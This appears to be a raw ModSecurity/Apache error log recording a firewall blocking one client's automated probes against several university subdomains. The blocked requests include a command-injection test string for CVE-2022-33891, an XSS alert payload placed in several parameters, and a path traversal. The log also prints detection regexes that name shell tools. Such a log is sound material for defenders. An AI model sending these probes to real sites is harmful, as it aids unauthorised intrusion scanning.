[Tue Aug 29 11:42:27.385545 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdUc1oAAAAZ"]
[Tue Aug 29 11:42:27.400492 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdTBAIAAAAY"]
[Tue Aug 29 11:42:27.402861 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdZZrMAAAAf"]
[Tue Aug 29 11:42:27.404757 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAQSW0EAAAA0"]
[Tue Aug 29 11:42:27.423131 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdPLzcAAAAT"]
[Tue Aug 29 11:42:27.423479 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdrEmkAAAAn"]
[Tue Aug 29 11:42:27.425032 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAbo-c0AAAAi"]
[Tue Aug 29 11:42:27.437015 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdsFhAAAAAo"]
[Tue Aug 29 11:42:27.445586 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdKXPMAAAAK"]
[Tue Aug 29 11:42:28.387675 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAd230AAAAAI"]
[Tue Aug 29 11:42:28.389118 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdPLzkAAAAT"]
[Tue Aug 29 11:42:28.407510 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAc92yMAAAAD"]
[Tue Aug 29 11:42:28.408520 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13NMCo-f0AAAdSZMAAAAAX"]
[Tue Aug 29 11:42:28.410415 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdftSAAAAAG"]
[Tue Aug 29 11:42:28.417615 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13NMCo-f0AAAc-51gAAAAN"]
[Tue Aug 29 11:42:28.468373 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdV7bkAAAAa"]
[Tue Aug 29 11:42:29.369366 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NcCo-f0AAAdaZPcAAAAM"]
[Tue Aug 29 11:42:29.428028 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13NcCo-f0AAAdQ3ggAAAAV"]
[Tue Aug 29 11:42:29.681089 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAeAW6YAAAAu"]
[Tue Aug 29 11:42:29.682882 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAd@3-cAAAAs"]
[Tue Aug 29 11:42:29.762561 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAeB1oAAAAAv"]
[Tue Aug 29 11:42:29.816547 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAdKXPUAAAAK"]
[Tue Aug 29 11:42:30.391584 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAd64QUAAAAp"]
[Tue Aug 29 11:42:30.456206 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] 